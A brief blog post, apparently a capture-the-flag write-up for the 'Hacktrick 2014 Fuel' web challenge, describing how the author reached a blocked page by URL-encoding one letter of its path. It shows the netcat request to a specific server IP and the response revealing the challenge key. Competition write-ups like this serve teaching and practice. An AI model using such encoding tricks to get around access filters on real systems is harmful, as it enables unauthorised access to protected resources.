Monday, May 12, 2014

Hacktrick 2014 - Fuel - Web Write-up

On this quest we need to reach a URL on the server, but iptables was set to prevent anyone from reaching it so the aim was to bypass it. The hint was pointing to a tool called 'fragroute' but we could not make it work and started to look new ways and asked ourselves why not url encode??

send a request like this on netcat:
nc 80.251.47.25 80
GET /%61dministrator.html
and received:
<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
Key : G1mm3fu3lG1mm3fir3
</body>
</html> 

No comments:

Post a Comment